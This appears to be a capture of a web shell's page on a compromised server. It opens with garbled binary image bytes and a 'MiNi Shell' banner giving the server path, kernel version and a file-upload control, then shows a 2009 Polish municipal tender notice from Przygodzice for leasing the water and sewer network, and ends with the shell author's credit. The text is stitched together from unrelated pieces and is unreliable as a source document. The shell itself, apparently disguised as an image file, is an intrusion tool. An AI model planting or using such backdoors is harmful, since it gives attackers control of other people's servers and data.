JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/774-N-2009.html

<p class="kh_header"><b>Przygodzice: Dzierżawa sieci wodociągowej i kanalizacyjnej wraz z infrastrukturą towarzyszącą stanowiącej własność  gminy Przygodzice w celu zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków</b><br>
<b>Numer ogłoszenia: 774 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przygodzice , Plac Powstańców Wielkopolskich 2, 63-421 Przygodzice, woj. wielkopolskie, tel. 062 5927722, faks 062 5927000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przygodzice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa sieci wodociągowej i kanalizacyjnej wraz z infrastrukturą towarzyszącą stanowiącej własność  gminy Przygodzice w celu zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dzierżawa sieci wodociągowej i kanalizacyjnej wraz z infrastrukturą towarzyszącą stanowiącej własność  gminy Przygodzice w celu zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków.

Zakres przedmiotu zamówienia obejmuje :

- świadczenie usług w zakresie zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków zgodnie z warunkami określonymi w Ustawie z dnia 7 czerwca 2001 r. o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków (Dz. U. z 2006 r. Nr 123 poz. 858 z późn. zm.), wraz z przepisami wykonawczymi, obowiązującym Regulaminie dostarczania wody i odprowadzania ścieków na terenie Gminy Przygodzice wprowadzonym Uchwałą Nr XXXVII/319/06 Rady Gminy Przygodzice z dnia 29 września 2006 r., w zezwoleniu na prowadzanie działalności zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków,
- prowadzenie racjonalnej gospodarki w zakresie zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków,
- zawieranie umów o zaopatrzenie w wodę i odprowadzanie ścieków z odbiorcami oraz rozliczanie się z odbiorcami na podstawie określonych w obowiązujących przepisach taryfach cen i stawek opłat,
- stałe promowanie usług i pozyskiwanie nowych odbiorców na dostawę wody i odbiór ścieków,
- zbieranie opłat za wodę i ścieki,
- współpraca z władzami gminy Przygodzice w zakresie zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków,
- przedstawianie Zamawiającemu każdorazowo do 15.08. danego roku kalkulacji kosztów i przychodów z tytułu eksploatacji przedmiotu dzierżawy - w tym ilu nowych odbiorców podłączyło się do sieci kanalizacyjnej - za I półrocze i do 15.11 danego roku kalkulacji kosztów i przychodów za okres działalności do 31.10 danego roku w celu ustalenia taryf na kolejny rok taryfowy ,  
- optymalizacja kosztów i opłat,
- rozpatrywanie skarg i wniosków odbiorców,
- umożliwienie wstępu przedstawicielowi Zamawiającego na obiekty celem dokonania kontroli lub innych czynności związanych z eksploatacją obiektów,
- umożliwienie wglądu do dokumentów księgowych Wykonawcy, na podstawie których strony umowy dokonują wzajemnych rozliczeń,
- Wykonawca ponosi wszelką odpowiedzialność odszkodowawczą za szkody związane z działalnością przedsiębiorstwa wodociągowo - kanalizacyjnego w związku z wykonywanymi usługami,
- używanie przedmiotu dzierżawy zgodnie z zasadami prawidłowej gospodarki w ramach prowadzonego przez Wykonawcę przedsiębiorstwa przestrzegając przy tym obowiązujących norm i przepisów, z wykorzystaniem zasad wiedzy ogólnej i technicznej instrukcji obsługi przedmiotu dzierżawy
- utrzymanie w sprawności technologicznej systemu wodociągowego oraz systemu kanalizacyjnego, zapewnienie ich prawidłowej pracy i eksploatacji, dokonywanie przeglądów, remontów bieżących, usuwanie awarii, wywóz nieczystości, osadów, popłuczyn i innych odpadów, 
- utrzymywanie pogotowia technicznego z zadaniem lokalizacji i ograniczenia skutków awarii oraz przystąpienie do jej usuwania najpóźniej w ciągu 12 godzin. Przystąpienie do zabezpieczenia awarii z chwilą otrzymania zgłoszenia;
- lokalizacja nieprawidłowo wykonanych przyłączy wodociągowych i kanalizacyjnych oraz punktów nielegalnych poborów wody lub spustu ścieków;
- wydawanie warunków technicznych nowym odbiorcom, uczestnictwo i wykonywanie czynności odbiorowych przyłączy indywidualnych i sieci przekazywanych do eksploatacji;
- wykonywanie modernizacji i zmian w systemie wodociągowym i kanalizacyjnym zmierzającym do jego usprawnienia a tym samym zmniejszenie kosztów utrzymania;
- przekazywanie Urzędowi Gminy Przygodzice informacji o stanie awarii i planowanych wyłączeniach dopływu wody lub odbioru ścieków po uprzednim powiadomieniu odbiorców;
- odcinanie nielegalnych przyłączy lub przykanalików;
- zabezpieczenia przedmiotu dzierżawy zgodnie z wymaganiami ochrony przeciwpożarowej, Państwowej Inspekcji Pracy, Państwowej Inspekcji Sanitarnej, Inspekcji Ochrony Środowiska etc. Oraz wykonywanie zaleceń tych organów na własny koszt,
- ubezpieczenie przedmiotu dzierżawy na własny koszt od wszelkich ryzyk przez cały okres dzierżawy, w tym ubezpieczenia budynków i ich wyposażenia oraz ruchomości od ognia i innych zdarzeń losowych, kradzieży z włamaniem i rabunku, według wartości rzeczywistej tych składników i okazania na żądanie Wydzierżawiającego polisy stanowiącej dowód zawarcia umowy ubezpieczenia.
- obowiązek dokonywania napraw i remontów niezbędnych 
do utrzymania przedmiotu dzierżawy w stanie niepogorszonym,
- nieodpłatnego wykonywanie następujących prac dla inwestycji, których inwestorem jest gmina Przygodzice:
. wydawanie warunków technicznych,
. wykonywanie uzgodnień dokumentacji projektowych,
. wykonywanie odbiorów technicznych obiektów wodno-kanalizacyjnych oddawanych do eksploatacji.
- obowiązek ponoszenia wszelkich kosztów i świadczeń związanych z eksploatacją przedmiotu dzierżawy - tym obciążeń z tytułu podatku od nieruchomości, zużycia wody, energii elektrycznej, telefonów i innych opłat obciążających przedmiot dzierżawy lub wynikających z przepisów o ochronie środowiska i gospodarki wodnej.

Opis obiektów przekazanych w dzierżawę stan na 31.12.2008r.:
Wartość księgowa obiektów ogółem wynosi: 13 581 383,56zł
Łączna długość sieci wodociągowej wynosi : 120km
Łączna długość sieci kanalizacyjnej wynosi : 16,5km
Ponadto :
- ilość wodomierzy głównych i urządzeń pomiarowych wody - 2768 szt.
 sprzedaż wody - 493 689 m3 / rok
- odprowadzane ścieki  - 47 958 m3 / rok
- ilość przyłączy kanalizacyjnych: 
- Janków Przygodzki - 103 szt. 
- Przygodzice - 151 szt. 
- Antonin - 69 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 65.10.00.00-4, 90.48.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy :
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tzn.:
- prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2007 r. Nr 155, poz. 1095 ze zm.),
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tzn. :
- w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywali co najmniej jeden raz usługi zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków, lub wykonują usługi zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków, 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn. :
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach lub w dokumentach.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. wypełniony formularz oferty,
2. oświadczenie o spełnieniu warunków udziału w postępowaniu,
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4. Wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenia zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających że usługi te zostały wykonane należycie. Wykonawca, który ubiega się o udzielenie zamówienia musi wykazać że wykonał co najmniej jeden raz usługi zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków lub wykonuje usługi zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków,
5. polisa a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
6. parafowany i podpisany wzór umowy jako akceptacja jego treści i warunków,
7. dotyczy podmiotów występujących wspólnie:
- dokument ustanawiający pełnomocnika,
- upoważnienie pełnomocnika do reprezentowania grupy wykonawców w postępowaniu o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.przygodzice.pl/index.php?pid=226.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Przygodzice, Plac Powstańców Wlkp. 2, 63-421 Przygodzice, I piętro, pok. nr 11. Na wniosek Wykonawca może odebrać SIWZ osobiscie lub za zaliczeniem pocztowym, opłata za SIWZ wynosi: 6,00zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 10:00, miejsce: Gmina Przygodzice-Urząd Gminy, Plac Powstańców Wlkp. 2, 63-421 Przygodzice, pok nr 1 - SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do porozumiewania się z Wykonawcami:
- w sprawach procedury przetargowej : mgr Piotr Kryszczak - Inspektor ds. projektów finansowych w Urzędzie Gminy w Przygodzicach, tel. 062 592 77 22 wew. 123,

Creat By MiNi SheLL
Email: jattceo@gmail.com